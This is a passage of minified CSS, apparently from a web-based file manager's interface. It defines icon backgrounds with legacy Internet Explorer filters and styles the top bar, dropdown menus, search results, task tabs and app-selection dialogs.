\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left.collapse{display:block;height:auto !important;}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out 